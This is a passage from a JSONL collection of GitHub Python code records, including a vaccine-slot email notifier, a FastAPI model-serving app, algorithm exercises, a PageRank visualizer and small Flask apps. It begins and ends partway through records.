TEXT = body\r\n SUBJECT = \"Automation Message for the COWIN Vaccine Notifier\"\r\n \r\n smtpserver = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\r\n smtpserver.ehlo()\r\n smtpserver.starttls()\r\n smtpserver.ehlo\r\n smtpserver.login(SMTP_USER_NAME, SMTP_PASSWORD)\r\n header = 'To:' + TO + '\\n' + 'From: ' + SMTP_USER_NAME\r\n header = header + '\\n' + 'Subject:' + SUBJECT + '\\n'\r\n msg = header + '\\n' + TEXT + '\\n\\n'\r\n smtpserver.sendmail(SMTP_USER_NAME, TO, msg)\r\n smtpserver.close()\r\n print(\"Email sent successfully to \" + email)\r\n\r\n def ulify(payload):\r\n string =\"Hi \"\r\n string += uname\r\n string += \"\\n\\nThis is the automation mail send from COWIN Vaccine Notifier\\n\\n\"\r\n string += \"\\n\".join([str(s) for s in payload])\r\n string += \"\\n\\nLink for COWIN Vacination Portal: https://www.cowin.gov.in \\nPS: Since your automation was successfully completed, the script was terminated.\\n\\nThank you for using COWIN Vaccine Notifier.\"\r\n return string\r\n \r\n body = ulify(payload)\r\n smtp(email, body)\r\n\r\nfor ba in range(attempt):\r\n date_api.append( (date.today()+timedelta(days=ba)).strftime(\"%d-%m-%Y\") ) \r\n\r\ndef main():\r\n global isUserNotified\r\n global available_flag_break\r\n\r\n while (isUserNotified == 0):\r\n for b in range(attempt):\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n exit\r\n\r\n if available_flag_break == 0 or isUserNotified == 0:\r\n curl = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=\"+district_id+\"&date=\"+str(date_api[b])\r\n user_agent = {'User-agent': 'Mozilla/5.0'}\r\n x = requests.get(curl, headers = user_agent)\r\n data = x.json()\r\n vax = data['centers']\r\n for i in vax:\r\n for j in i['sessions']:\r\n if j['vaccine'] == vaccine_type and i['fee_type'] == fee_type and j['available_capacity'] > 0 and j['min_age_limit'] == age_limit and j['date'] == date_api[b]:\r\n count = j['available_capacity']\r\n name = i['name']\r\n date = j['date']\r\n p = \"There are \",count,\" \",vaccine_type,\" available in \",name,\" on \",date\r\n pp = ''.join(str(p) for p in p)\r\n print(p)\r\n payload.append(pp)\r\n isUserNotified = 1\r\n available_flag_break = 1\r\n break\r\n sendmail(payload, email) \r\n print(\"going to sleep for {} minutes.\".format(wait_time/60))\r\n time.sleep(wait_time)\r\n","repo_name":"guruhariharaun/CoWIN-Vaccine-Notifier","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"960713365","text":"from typing import Union\nimport uvicorn\nfrom fastapi import FastAPI, File, UploadFile\nfrom fastapi.middleware.cors import CORSMiddleware\nimport numpy as np\nfrom io import BytesIO\nfrom PIL import Image\nimport tensorflow as tf\nimport requests\nfrom flask_cors import CORS\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# specify the correct endpoint\nendpoint = \"http://localhost:8504/v1/models/saved_model:predict\"\nCLASS_NAME = [\"early blight\", \"late blight\", \"healthy\"]\n\n@app.get(\"/ping\" )\nasync def ping():\n return \"pinging..\"\n\n\ndef readFileAsImage(data) ->np.ndarray:\n #convert the uploaded file to numpy array\n image = np.array(Image.open(BytesIO(data)))\n return image\n\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile = File(...)):\n image = readFileAsImage(await file.read())#await helps the system to handle multiple requests\n img_batch = np.expand_dims(image, 0)#remember the model takes a batch image as input but here we are provinding only one image. so we expand dimensions \n json_data = {\n \"instances\": img_batch.tolist()\n }\n response = requests.post(endpoint,json=json_data)\n prediction = np.array(response.json()[\"predictions\"][0])\n \n predicted_class = CLASS_NAME[np.argmax(prediction)]\n confidence = np.max(prediction)\n\n return {\n \"class\": predicted_class,\n \"confidence\": float(confidence)\n }\n\ndef application(environ, start_response):\n if environ['REQUEST_METHOD'] == 'OPTIONS':\n start_response(\n '200 OK',\n [\n ('Content-Type', 'application/json'),\n ('Access-Control-Allow-Origin', '*'),\n ('Access-Control-Allow-Headers', 'Authorization, Content-Type'),\n ('Access-Control-Allow-Methods', 'POST'),\n ]\n )\n return ''\n\nif __name__ == \"__main__\":\n uvicorn.run(app,host='localhost',port=8060)","repo_name":"NelsonMbogori/fastApi-MAchineLearning","sub_path":"maintfserving.py","file_name":"maintfserving.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"36404104877","text":"# https://www.acmicpc.net/problem/18352\nimport sys\nfrom collections import deque\n\nn, m, k, x = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n + 1)]\ndistance = [-1] * (n + 1)\ndistance[x] = 0\n\nfor _ in range(m):\n a, b = map(int, sys.stdin.readline().split())\n graph[a].append(b)\n\nqueue = deque([x])\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if distance[i] == -1:\n queue.append(i)\n distance[i] = distance[v] + 1\n\ncheck = False\nfor i in range(1, n + 1):\n if distance[i] == k:\n print(i)\n check = True\n\nif check == False:\n print(-1)","repo_name":"graygreat/algorithm-study","sub_path":"BaekJoon/Searching/특정_거리의_도시_찾기_18352.py","file_name":"특정_거리의_도시_찾기_18352.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23046737677","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass ImageZono:\n # ImageZono class\n # Class for representing set of images using Zonotope\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageZono Set \n # author: Sung Woo Choi\n # date: 9/30/2021\n\n # 2-Dimensional ImageZono\n # ====================================================================%\n # Definition of 2-Dimensonal ImageZono\n # \n # A ImageZono Z= is defined by: \n # S = {x| x = c + a[1]*V[1] + a[2]*V[2] + ... + a[n]*V[n]\n # = V * b, V = {c V[1] V[2] ... V[n]}, \n # b = [1 a[1] a[2] ... a[n]]^T \n # where -1 <= a[i] <= 1}\n # where, V[0], V[i] are 2D matrices with the same dimension, i.e., \n # V[i] \\in R^{m x n}\n # V[0] : is called the center matrix and V[i] is called the basic matrix \n # [a[1]...a[n] are called predicate variables\n # The notion of 2D ImageZono is more general than the original Zonotope where\n # the V[0] and V[i] are vectors. \n # \n # Dimension of 2D ImageZono is the dimension of the center matrix V[0]\n # \n # ====================================================================%\n # The 2D representation of ImageZono is convenient for reachability analysis\n\n def __init__(obj, V = np.array([]), # an array of basis images \n lb_image = np.array([]), # lower bound of attack (high-dimensional array)\n ub_image = np.array([])): # upper bound of attack (high-dimensional array)\n from engine.set.star import Star\n from engine.set.zono import Zono\n\n if V.size:\n assert isinstance(V, np.ndarray), 'error: an array of basis images is not an ndarray'\n\n obj.V = V\n [obj.numChannels, obj.height, obj.width] = obj.V[0].shape\n obj.numPreds = obj.V.shape[0] - 1\n\n center = obj.V[1,:,:,:]\n generators = obj.V[1:obj.numPreds + 1, :,:,:]\n center = center.reshape(-1,1)\n generators = generators.reshape(-1, obj.numPreds)\n\n Z = Zono(center, generators)\n [lb, ub] = Z.getBounds()\n\n # A box representation of an ImageZono\n # A convenient way for user to specify the attack\n obj.lb_image = np.array(lb).reshape((obj.numChannels, obj.height, obj.width))\n obj.ub_image = np.array(ub).reshape((obj.numChannels, obj.height, obj.width))\n return\n\n\n if lb_image.size and ub_image.size:\n assert isinstance(lb_image, np.ndarray), 'error: a lower bound of attack is not an ndarray'\n assert isinstance(ub_image, np.ndarray), 'error: a upper bound of attack is not an ndarray'\n\n if lb_image.shape != ub_image.shape:\n raise Exception('error: different sizes between lower bound image and upper bound image')\n\n obj.lb_image = lb_image\n obj.ub_image = ub_image\n\n if len(lb_image.shape) == 3:\n obj.numChannels = obj.lb_image.shape[0] # number of channels, e.g., color images have 3 channel\n obj.height = obj.lb_image.shape[1] # height of image\n obj.width = obj.lb_image.shape[2] # width of image\n elif len(lb_image.shape) == 2:\n obj.numChannels = 1\n obj.height = obj.lb_image.shape[0]\n obj.width = obj.lb_image.shape[1]\n else:\n raise Exception('image bounds need to be a tuple of three elements: numChannels, image width, image height')\n lb = obj.lb_image.reshape(-1,1)\n ub = obj.ub_image.reshape(-1,1)\n\n S = Star(lb=lb, ub=ub)\n obj.numPreds = S.nVar # number of predicate variables\n obj.V = np.reshape(S.V, (obj.numPreds + 1, obj.numChannels, obj.height, obj.width))\n return\n \n raise Exception('error: failed to create ImageZono')\n\n#------------------check if this function is working--------------------------------------------\n # evaluate an ImageZono with specific values of predicates\n def evaluate(obj, pred_val = np.matrix([])):\n # @pred_val: valued vector of predicate variables\n\n assert obj.V.size, 'error: the ImageZono is an empty set'\n assert pred_val.size[1] == 1, 'error: invalid predicate vector'\n assert pred_val.size[0] == obj.numPreds, 'error: inconsistency between the size of the predicate vector and the number of preeicates in the ImageZono'\n\n # check if all values of predicate variables are in [-1, 1]\n for i in range(obj.numPreds):\n if not (pred_val[i]<=1 and pred_val[i]>=-1):\n raise Exception('error: predicate values should be in the range of [-1, 1] for ImageZono')\n\n image = np.zeros((obj.numChannels, obj.height, obj.width))\n for i in range(obj.numChannels):\n image[i, :, :] = obj.V[1, i, :, :]\n for j in range(1, obj.numPreds + 1):\n image[i, :, :] = image[i, :, :] + pred_val[j-1] * obj.V[j, i, :, :]\n return image\n\n # affineMap of an ImageZono is another ImageZono\n # y = scale * x + offset\n def affineMap(obj, scale, offset):\n # @scale: scale coefficient [1 x 1 x NumChannels] array\n # @offset: offset coefficient [1 x 1 x NumChannels] array\n # return: a new ImageZono\n\n assert scale.size and not np.isscalar(scale) and scale.shape[0] == obj.numChannels, 'error: inconsistent number of channels between scale array and the ImageZono'\n \n if scale.size:\n new_V = scale * obj.V\n else:\n new_V = obj.V\n\n if offset.size:\n new_V[1, :, :, :] = new_V[1, :, :, :] + offset\n \n return ImageZono(new_V)\n\n # transform to Zono\n def toZono(obj):\n from engine.set.zono import Zono\n\n center = obj.V[1,:,:,:,]\n generators = obj.V[1:obj.numPreds + 1,:,:,:]\n\n center = center.reshape(-1, 1)\n generators = np.reshape(generators, (obj.height*obj.width*obj.numChannels, obj.numPreds))\n return Zono(center, generators)\n\n#------------------check if this function is working--------------------------------------------\n # transform to ImageStar\n def toImageStar(obj):\n from imagestar import ImageStar\n pred_lb = -np.ones((obj.numPreds, 1))\n pred_ub = np.ones((obj.numPreds, 1))\n\n C = np.hstack((np.eye(obj.numPreds), -np.eye(obj.numPreds))) \n d = np.hstack((pred_ub, -pred_lb))\n return ImageStar(obj.V, C, d, pred_lb, pred_ub, obj.lb_image, obj.ub_image)\n \n\n#------------------check if this function is working--------------------------------------------\n # contain, check if an ImageZono contain an image\n def contains(obj, image):\n # @image: input image\n # @bool = 1 if the ImageStar contain the image\n # 2 if the ImageStar does not contain the image\n\n n = image.shape\n if len(n) == 2: # one channel image\n assert obj.numChannels == 1 and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n elif len(n) == 3:\n assert n[0] == obj.numChannels and n[1] == obj.height and n[2] == obj.width, 'error: inconsistent dimenion between input image and the ImageStar'\n y = image.flatten()\n else:\n raise Exception('error: invalid input image')\n\n Z = obj.toZono()\n return Z.contains(y)\n\n # get Ranges\n def getRanges(obj):\n return [obj.lb_image, obj.ub_image]\n\n#------------------check if this function is working--------------------------------------------\n def is_p1_larger_p2(obj, p1, p2):\n # @p1: the first point = []\n # @p2: the second point = []\n # h: height, w: width, c: channel index\n\n # @b = 1 -> p1 > p2 is feasible\n # = 0 -> p1 > p2 is infeasible\n\n S = obj.toImageStar\n return S.is_p1_larger_p2(p1, p2)\n \n def __str__(obj):\n print('class: %s' % (obj.__class__))\n print('height: %s \\nwidth: %s' % (obj.height, obj.width))\n print('lb_image: [%sx%sx%s %s]' % (obj.lb_image.shape[0], obj.lb_image.shape[1], obj.lb_image.shape[2], obj.lb_image.dtype))\n print('ub_image: [%sx%sx%s %s]' % (obj.ub_image.shape[0], obj.ub_image.shape[1], obj.ub_image.shape[2], obj.ub_image.dtype))\n if len(obj.V.shape) == 4:\n print('V: [%sx%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.shape[3], obj.V.dtype))\n else:\n print('V: [%sx%sx%s %s]' % (obj.V.shape[0], obj.V.shape[1], obj.V.shape[2], obj.V.dtype))\n return 'numPreds: %s\\n' % (obj.numPreds)\n \n def __repr__(obj):\n return \"class: %s \\nnumChannels: %s\\nheight: %s\\nwidth: %s\\nlb_image:\\n%s\\nub_image: \\n%s\\nV: \\n%s\\nnumPred: %s\" % (obj.__class__, obj.numChannels, obj.height, obj.width, obj.lb_image, obj.ub_image, obj.V, obj.numPreds)\n\n\n\n\n","repo_name":"V2A2/StarV_temp","sub_path":"engine/set/imagezono/imagezono.py","file_name":"imagezono.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18950976005","text":"##\n## EPITECH PROJECT, 2021\n## 109titration\n## File description:\n## main\n##\n\nimport sys\nfrom utils import *\nfrom calc import *\n\ndef titration(data):\n\tderive = calc_deriv(data)\n\tcalc_deriv_bis(derive, data)\n\tcalc_deriv_bis_estimation(derive, data)\n\ndef main():\n\tcheck_arguments()\n\tdata = load_csv_file()\n\ttitration(data)","repo_name":"Xantass/Project-Epitech","sub_path":"Semester_2/109titration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7686272889","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom admin_tools.menu import items\nfrom jmb.core.admin.menu import register_menu\n\ncurrency_menu_item = items.MenuItem(\n _('project'),\n reverse('admin:app_list', kwargs={'app_label': 'project'}),\n children=[\n items.MenuItem(_('add project'), reverse('admin:project_project_add', )),\n items.MenuItem(_('list project'), reverse('admin:project_project_changelist', )),\n items.MenuItem(_('add task'), reverse('admin:project_task_add', )),\n items.MenuItem(_('list task'), reverse('admin:project_task_changelist', )),\n ]\n)\n\nregister_menu(currency_menu_item, 'project')\n","repo_name":"monkeybits/edilcloud-back","sub_path":"apps/project/jmenu.py","file_name":"jmenu.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29052582314","text":"# 숫자가 쓰인 카드들이 N x M 형태로 놓여 있다. N은 행의 개수, M은 열의 개수\n# 먼저 뽑고자 하는 카드의 행 선택\n# 그 다음 선택된 행에 포함된 카드 중 가장 낮은 카드 뽑음\n# 처음 카드를 골라낼 행을 선택할 때, 이후에 해당 행에서 가장 숫자가 낮은 카드를 뽑을 것을 고려하여 최종적으로 가장 높은 숫자의 카드를 뽑을 수 있도록 전략 세움\n# 카드에 적힌 숫자는 1 이상 10,000 이하의 자연수\n# 행의 개수 N과 열의 개수 M이 공백을 기준으로 하여 각각 자연수로 주어짐(1 <= N, M <= 100)\n\nn, m = list(map(int, input().split()))\n\nresult = 0\n\nfor i in range(n):\n data = list(map(int, input().split()))\n min_value = min(data)\n result = max(result, min_value)\n\nprint(result)\n","repo_name":"ImWonYong/TIL","sub_path":"Algorithm/Greedy/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"35782801024","text":"from flask import Flask, render_template, request\r\nfrom openpyxl import load_workbook, Workbook\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\n\r\n# Function to create or load the Excel file\r\ndef get_workbook():\r\n try:\r\n workbook = load_workbook(\"user_data.xlsx\")\r\n except FileNotFoundError:\r\n workbook = Workbook()\r\n sheet = workbook.active\r\n sheet.append([\"Name\", \"Email\", \"Employ Code\", \"Optical Message\", \"Date and Time\"])\r\n return workbook\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form.get('name')\r\n email = request.form.get('email')\r\n emp_code = request.form.get('empCode')\r\n optical_message = request.form.get('opticalMessage')\r\n \r\n # Add the current date and time\r\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n workbook = get_workbook()\r\n sheet = workbook.active\r\n\r\n # Add the submitted data along with the timestamp to the Excel file\r\n sheet.append([name, email, emp_code, optical_message, timestamp])\r\n\r\n # Save the Excel file\r\n excel_file_name = \"user_data.xlsx\"\r\n workbook.save(excel_file_name)\r\n\r\n return render_template('index.html', message=\"Data saved successfully!\")\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"ImShehan/UserDataApplication","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34613178159","text":"from redis import Redis\n\nclient = Redis()\nprint(client.ping())\nif client.ping():\n print(1111111111)\n\n\na = [2,3,4, 123,333, 1]\nb = (1,2,3,4,5)\nprint(zip(a, b))\na = list(zip(a, b))\nprint(a)\n\na = '2020-01-01 02:02:00'\nimport datetime\na = datetime.datetime.strptime(a, '%Y-%m-%d %X')\nprint(a)\nb = a + datetime.timedelta(hours=8)\nprint(b)\n\n\n","repo_name":"281234086/data_struct","sub_path":"redis_study/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28863125662","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\n\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH);\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT); \nout = cv2.VideoWriter('output.avi', fourcc, 15.0, (int(w),int(h)))\n\n\nwhile True:\n\tret, frame = cap.read()\n\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tout.write(frame)\n\n\tcv2.imshow('frame',frame)\n\tcv2.imshow('gray',gray)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","repo_name":"LatentFreedom/ShoulderSurfingDetection","sub_path":"OpenCV_Exercises/VideoInput.py","file_name":"VideoInput.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25207267707","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom process import main\n\nclass Generator_card_Shuffle(ttk.Frame):\n # default\n name_file_to_count = 'A'\n\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n file_to_count = tk.StringVar()\n\n self.label_file_to_count = ttk.Label(self, text='Counting Flop Pattern')\n self.label_file_to_count.grid(row=0, column=0, columnspan=4, sticky='N',pady=15)\n self.label_name_file_to_count = ttk.Label(self, text=\"Name file to count:\")\n self.label_name_file_to_count.grid(row=1, column=0, sticky=tk.W)\n self.entry_number_of_rows = ttk.Entry(self, width=10, textvariable=file_to_count)\n self.entry_number_of_rows.grid(row=1, column=1, sticky=tk.W, padx=5)\n\n self.button_counting = ttk.Button(self, text=\"Counting\", command=self.counting)\n self.button_counting.grid(row=4, column=0, columnspan=4, pady=20, sticky=\"N\")\n\n self.name_file_to_count = file_to_count.get()\n\n option_list = ('Count_All','Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)')\n self.option_menu = ttk\n value = tk.StringVar(self)\n value.set('เลือก Option')\n self.option_menu = tk.OptionMenu(self, value, *option_list)\n self.option_menu.config(width=10)\n self.option_menu.grid(row=2, column=0, columnspan=2, pady=5, sticky=\"N\")\n self.value = value\n\n def get_option(self):\n return self.value.get()\n\n\n def counting(self):\n self.name_file_to_count = self.entry_number_of_rows.get()\n if self.get_option() == 'Count_All':\n main(self.name_file_to_count,['Turn(1)', 'River(1)', 'Small blind(2)', 'Big blind(2)', 'Under the gun(UTG)(2)','Under the gun(UTG)+1(2)', 'Middle position (MP)(2)', 'Middle position (MP)+1(2)', 'Cut off(2)','Button(2)'])\n else:\n main(self.name_file_to_count,[self.get_option()])\n self.popup()\n\n def popup(self):\n self.popup_window = tk.Toplevel()\n self.popup_window.title(\"Done!\")\n self.popup_window.geometry(\"150x50\")\n self.popup_window.resizable(False, False)\n self.popup_window.wm_attributes(\"-topmost\", 1)\n self.button_counting = ttk.Button(self.popup_window, text=\"OK\", command=self.popup_window.destroy)\n self.button_counting.grid(row=3, column=0, columnspan=4, pady=20, sticky=\"N\")\n self.button_counting.pack()\n\n\n\n\nif __name__ == \"__main__\":\n app = tk.Tk()\n app.title(\"Flop Counting\")\n app.geometry(\"250x170\")\n app = Generator_card_Shuffle(master=app)\n app.mainloop()\n","repo_name":"JamesAsuraA93/Excel_main","sub_path":"counting/app_counting.py","file_name":"app_counting.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11284933362","text":"from fastapi import FastAPI, File, HTTPException\n\n# Please see https://dhali.io/docs/#/ for more info\n\n# \n\napp = FastAPI()\n\n# \n\n@app.put(\"/run/\")\nasync def infer(input: bytes = File()):\n\n try:\n # You must extract the input to the model from `input`.\n #\n # If `input` is a text string:\n # text=input.decode(\"utf-8\")\n #\n # If `input` is a json object:\n # import json\n # json_input = json.loads(input.decode(\"utf-8\"))\n #\n # If `input` is an image:\n # from PIL import Image\n # image = Image.open(io.BytesIO(input))\n #\n # If `input` is an image base64 embedded into a json:\n # import json\n # import base64\n # json_input = json.loads(input.decode(\"utf-8\"))\n # img_data = json_input[\"image\"].encode()\n # content = base64.b64decode(img_data)\n #\n # \n # \n # \n #\n # The format of the result can be anything returnable from a FastAPI\n # endpoint. E.g.:\n\n return {\"results\": \"CALCULATED RESULT\"}\n \n except Exception as e:\n raise HTTPException(422, f\"Your input could not be parsed: {e}\")\n","repo_name":"Dhali-org/Dhali-asset-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41307310409","text":"import argparse\nfrom songs import get_songs, extract_details\nfrom matches import matches \nfrom playlist import extract_id_from_uri\nimport json\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Use a query string to search a list of spotify playlists')\n\n parser.add_argument('--playlist', \"-p\", help=\"spotify playlist URI\", required=True, action=\"append\")\n parser.add_argument('--query', \"-q\", help=\"query string\", required=True)\n parser.add_argument('--verbose', \"-v\", help=\"verbose output\", action=\"store_false\", default=False)\n return parser.parse_args()\n\ndef build_url(uri):\n return \"https://open.spotify.com/playlist/\" + extract_id_from_uri(uri)\n\ndef run():\n args = get_args()\n urls = [build_url(uri) for uri in args.playlist]\n songs = [song for url in urls for song in get_songs(url)]\n\n matched_songs = matches(args.query, songs)\n if args.verbose:\n print(json.dumps(matched_songs))\n else:\n print(json.dumps([extract_details(song) for song in matched_songs]))\n\nif __name__ == \"__main__\":\n run()","repo_name":"dandandy/spotplaylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20889295813","text":"#!/usr/bin/env python3\n\nimport os, sys, json\nimport pandas as pd\nimport numpy as np\nfrom pyvis.network import Network\n\n\ndef run_PageRank(filein):\n \"\"\"Run PageRank.py and create a file to save results.\n\n Args:\n filein (str): File path of a file fotmated as follow :\n fromNode\\ttoNode\\n\n fromNode\\ttoNode\\n\n etc\n \"\"\" \n os.system(f\"python PageRank.py {filein} > {os.path.join('output','results.txt')}\")\n\ndef convert_results_txt2json():\n \"\"\"Convert results.txt (created by run_PageRank function) to json format.\n \"\"\" \n with open(os.path.join('output','results.txt'), \"r\") as filein:\n with open(os.path.join('output','results.json'), \"w\") as fileout:\n fileout.write(\"[\")\n for line in filein:\n fileout.write(\"{\" + line.strip().replace(\"\\t\", \":\") + \"},\\n\")\n fileout.write('{\"-1\" : {\"rank\":0.0,\"AdjacencyList\":[]}}\\n]')\n\ndef get_rank_df():\n \"\"\"Create Dataframe : rank = pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \"\"\"\n id = []\n pagerank = []\n redirect_list = []\n with open(os.path.join('output','results.json'), \"r\") as f:\n results = json.load(f)\n for elm in results:\n id.append(int(list(elm.keys())[0]))\n pagerank.append(list(elm.values())[0][\"rank\"])\n redirect_list.append(list(elm.values())[0][\"AdjacencyList\"])\n return pd.DataFrame({\"id\":id, \"pagerank\":pagerank, \"redirect_list\":redirect_list})\n \ndef get_net_df():\n \"\"\"Create Dataframe : net = pd.DataFrame({\"source\":source, \"target\":target})\n \"\"\"\n source = []\n target = []\n with open(filein, \"r\") as f:\n for line in f:\n line = line.strip().split('\\t')\n source.append(int(line[0]))\n target.append(int(line[1]))\n return pd.DataFrame({\"source\":source, \"target\":target})\n\ndef get_topn_df(rank, net, n):\n \"\"\"Get Top n sort by pagerank from net DataFrame\n \"\"\"\n topn = rank[[\"id\", \"pagerank\"]].sort_values(by=\"pagerank\", ascending=False)[:n]\n print(f\"\\nTop {n} nodes :\\n\", topn)\n return net[net.source.isin(topn.id)].astype(str)\n \ndef visualization(net_topn) :\n network = Network(height='1000px', width='100%', bgcolor='#222222', font_color='white')\n network.barnes_hut()\n \n sources = net_topn.source\n targets = net_topn.target\n weights = np.ones(len(net_topn))\n for src, dst, w in zip(sources, targets, weights):\n network.add_node(src, src, title=src)\n network.add_node(dst, dst, title=dst)\n network.add_edge(src, dst, value=w)\n\n neighbor_map = network.get_adj_list()\n\n # add neighbor data to node hover data\n for node in network.nodes:\n node['value'] = len(neighbor_map[node['id']]) * 100\n\n network.show_buttons(filter_=['physics'])\n network.show(os.path.join('output','network.html'))\n \n \nif __name__==\"__main__\":\n \n if len(sys.argv)<2:\n raise Exception(\"Missing arguments\")\n filein = sys.argv[1]\n \n os.makedirs('output', exist_ok = True)\n if not os.path.isfile(os.path.join('output','results.txt')):\n print('run')\n run_PageRank(filein)\n if not os.path.isfile(os.path.join('output','results.json')):\n convert_results_txt2json()\n \n # Get top n\n rank = get_rank_df()\n net = get_net_df()\n net_topn = get_topn_df(rank, net, 5)\n\n # Visualization\n visualization(net_topn)\n","repo_name":"amait41/pagerank","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11567243425","text":"#!/usr/bin/python3\ndef weight_average(my_list=[]):\n if not my_list:\n return 0\n\n weight = 0\n score = 0\n for pair in my_list:\n a, b = pair\n score += a * b\n weight += b\n return score / weight\n","repo_name":"Ella711/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/100-weight_average.py","file_name":"100-weight_average.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33339250689","text":"from flask import Blueprint, render_template, abort, Flask, request, send_from_directory\nfrom flask.ext.sqlalchemy import SQLAlchemy\nimport json\nfrom flask.ext.jsonpify import jsonify\n\nbadge = Flask(__name__)\nbadge.config.from_object('badges.config')\ndb = SQLAlchemy(badge)\nfrom badges import models\nfrom badges.models import *\nbadges = Blueprint('badges', 'badges')\n\n#========= The above part will be more or less the same for all GDE =======#\n\n#========================= Non-route functions ============================#\n\ndef add_user(username):\n me = User(username)\n db.session.add(me)\n db.session.commit()\n return\n\ndef find_user_force(username):\n user = User.query.filter_by(nickname=username).first()\n if user is None:\n add_user(username)\n user = User.query.filter_by(nickname=username).first()\n return user\n\ndef find_badge(name):\n badge = Badge.query.filter_by(name=name).first()\n return badge\n\ndef delete_all_users(username):\n users = User.query.all()\n for user in users:\n db.session.delete(user)\n db.session.commit()\n\n#========================= Routes are defined below =======================#\n\n@badges.route('/', defaults={'page': 'index'})\ndef module_name(page):\n return 'Badges module'\n\n@badges.route('/users', methods=[\"GET\"])\ndef show_all_users():\n users = User.query.all()\n data = []\n for user in users:\n data.append({\n 'id': user.id,\n 'name': user.nickname\n })\n return jsonify({\n 'success': True,\n 'message': '',\n 'data': data\n })\n\n@badges.route('/user/', methods=[\"GET\"])\ndef show_user(page):\n user = User.query.filter_by(nickname=page).first()\n badge_ids = UserBadge.query.filter_by(user_id=user.id)\n badges = []\n for b in badge_ids:\n badge = Badge.query.filter_by(id=b.badge_id).first()\n badges.append(badge.to_dict())\n data = ({\n 'id': user.id,\n 'name': user.nickname,\n 'badges': badges\n })\n return jsonify({\n 'success': True,\n 'message': 'User exist',\n 'data': data\n })\n\n@badges.route('/create', methods=[\"POST\"])\ndef create_badge():\n try:\n badge = Badge(request.form['name'], request.form['description'], request.form['image_name'])\n db.session.add(badge)\n db.session.commit()\n except:\n return jsonify({\n 'success': False,\n 'message': 'Something went wrong :('\n })\n return jsonify({\n 'success': True,\n 'message': 